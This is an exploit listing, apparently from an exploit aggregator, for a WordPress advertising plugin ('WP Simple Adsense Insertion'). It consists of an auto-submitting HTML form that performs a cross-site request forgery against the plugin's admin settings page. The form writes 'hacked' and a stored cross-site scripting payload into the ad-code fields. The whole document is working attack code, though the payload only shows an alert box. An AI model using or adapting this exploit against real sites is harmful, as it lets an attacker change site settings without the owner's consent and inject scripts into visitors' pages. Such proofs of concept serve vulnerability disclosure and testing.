Share
## https://sploitus.com/exploit?id=WPEX-ID:2AC5B87B-1390-41CE-AF6E-C50E5709BAAA
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wordpress-plugin-for-simple-google-adsense-insertion/WP-Simple-Adsense-Insertion.php" method="POST">
    <input type="text" name="info_update" value="true">
    <input type="text" name="wp_ad_camp_1_code" value="hacked">
    <input type="text" name="wp_ad_camp_2_code" value="<script>alert('boo!')</script>">
    <input type="text" name="wp_ad_camp_3_code" value="">
    <input type="text" name="wp_ad_camp_4_code" value="">
    <input type="text" name="wp_ad_camp_5_code" value="">
    <input type="text" name="wp_in_article_ad_code" value="">
    <input type="text" name="wp_post_article_ad_code" value="hacked">
    <input type="text" name="info_update" value="Update options">
</form>
<script>
    document.getElementById("test").submit();
</script>